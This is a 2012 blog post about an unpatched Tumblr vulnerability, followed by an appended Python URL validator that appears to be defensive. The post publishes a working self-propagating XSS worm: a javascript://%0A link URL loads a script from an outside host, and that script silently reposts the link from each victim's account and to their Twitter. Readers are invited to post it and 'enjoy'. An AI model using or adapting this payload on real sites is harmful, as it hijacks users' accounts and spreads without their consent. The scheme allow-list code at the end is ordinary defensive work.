Thursday, June 21, 2012

Tumblr. "Full Disclosure" or Why I Hate Reporting
Security is art for me. Reporting yet another routine vulnerability (an XSS, say) is just routine.
Now the question is: why is reporting a vulnerability always such a hassle and a tedious email ping-pong?
Should we have another startup, getavuln.com (by analogy with getsatisfaction), which aggregates vulnerabilities for all websites to make reporting easier? I'm kidding.

Frankly, I want every flaw I find to be fixed. I report it, and so far I have reported to more than 20 pretty popular sites. Only one of them (Skrill) was nice enough to pay me a bounty, and just a few of them said 'thanks'.

I'm pissed off explaining to Tumblr's technical support what the vulnerability is and how to fix it. Getting the reply "What is your browser and which OS do you use?" - WTF, why do you waste my time? :(

So I am angry about two things: Tumblr spams my Twitter without my approval, and Tumblr is not fixing the vulnerability I reported (for free..) a month ago (on 22 May). It's not full disclosure, because it had also been known since May 19. I warned you, I did.
Create a link post with your ANYFUNNYTITLE and LONG FUNNY DESCRIPTION.

Set the URL to:
javascript://%0A
s=document.createElement('script');s.src='//homakov.github.com/tumblr_inject.js';document.head.appendChild(s);//"
http://ANYFUNNYURL.com

Save your inject.js somewhere:

// save it as YOUR_INJECT_URL.js
// do anything you want - you are on the 'tumblr.com' origin
var inject_js = '';
$$('a').each(function(a){ if(a.href.indexOf('ANYFUNNYURL.com') != -1){ inject_js = a.href; } });
new Ajax.Request('/new/link', {parameters:{'post[date]':'now','post[source_url]':'http://','send_to_twitter':'on','is_rich_text[one]':0,'form_key':document.getElementById('form_key').value,'post[one]':'ANYFUNNYTITLE','post[two]':inject_js,'post[three]':'LONG FUNNY DESCRIPTION','post[type]':'link','channel_id':0,'post[state]':0,'is_rich_text[two]':0,'is_rich_text[three]':1}});
setTimeout(function(){
  document.location = "//ANYFUNNYURL.com";
}, 3000);
Post the link and enjoy: everyone who clicks it will reblog it without noticing anything. You can also add me on Tumblr and then click the link in your dashboard to see it in action instantly.

Get 'reports' first - Twitter and RSS.
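As an added example (not from the original post and not Tumblr's code), here is the server-side check a link form should apply to a user-supplied URL: normalize the value the way a browser will before it executes anything (percent-decode, drop control characters and whitespace), then allow only the http and https schemes, so the javascript://%0A form above is refused. The function names and the sample URLs are my own assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Scheme allow-list: anything not listed (javascript:, data:, vbscript:,
# a missing scheme, ...) is rejected instead of enumerating bad schemes.
ALLOWED_SCHEMES = {"http", "https"}

# Browsers discard ASCII control characters and whitespace while parsing a
# URL, so "java\tscript:" or " javascript:" still execute; mirror that here.
_CTRL_OR_SPACE = re.compile(r"[\x00-\x20\x7f]")


def normalize_url(raw: str) -> str:
    """Percent-decode repeatedly (undoes double encoding such as %256A)
    and strip control characters. Used only for the decision; the stored
    value is whatever the user submitted, if it passes."""
    value = raw
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return _CTRL_OR_SPACE.sub("", value)


def is_safe_link_url(raw: str) -> bool:
    """True only for absolute http(s) URLs. The javascript://%0A payload
    normalizes to 'javascript://...' and fails the scheme allow-list."""
    scheme = urlsplit(normalize_url(raw)).scheme.lower()
    return scheme in ALLOWED_SCHEMES


if __name__ == "__main__":
    # Constructed sample inputs, not data from Tumblr.
    for url in ("http://example.com/page",
                "javascript://%0Aalert(document.domain)",
                "java\tscript:alert(1)",
                "%6Aavascript:alert(1)"):
        print(is_safe_link_url(url), repr(url))
```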
